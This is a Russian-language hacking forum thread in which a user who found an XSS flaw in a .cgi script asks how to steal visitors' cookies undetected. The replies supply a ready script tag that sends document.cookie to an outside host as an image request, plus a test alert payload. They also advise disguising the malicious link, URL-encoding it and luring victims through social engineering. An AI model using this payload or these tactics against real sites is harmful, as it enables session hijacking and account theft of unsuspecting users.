![]() |
Подскажите по Xss
Нашел XSS уязвимость... в запросе .cgi файла... могу в хтмл-код внедрить любой другой хтмл код :-)
Что дальше сделать можно? К примеру как беспалева потырить кукизы.. ведь не пошлешь же ты напрямую ссылку со скриптами :) |
Заныкай ссылку со скриптами здесь - http://loc.netsec.ru/create.html
|
Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> |
Цитата:
patt="><script>alert(document.cookie)</script> Вот... гм... как бы его протолкнуть... |
СИ применить. Хотя весьма не надёжно.
|
Я предлогаю ознакомится со следующей статьей.
Мне говорили, что она интересная ))) http://www.security-teams.net/index.php?showtopic=2492 |
1. переводиш ссылку со скриптом в ури кодировку, и методом СИ париш жертве.
2. поступаеш тем способом что описал я в статье про взлом аккаунтов на народе, или Censored про взлом аккаунтов на форуме Хакера, т.е. из пассива как бы делаеш актив. 3. побольше фантазии!!! )) |
porter
Пример можешь показать как заныканой ссылкой пользоваться |
| Время: 15:12 |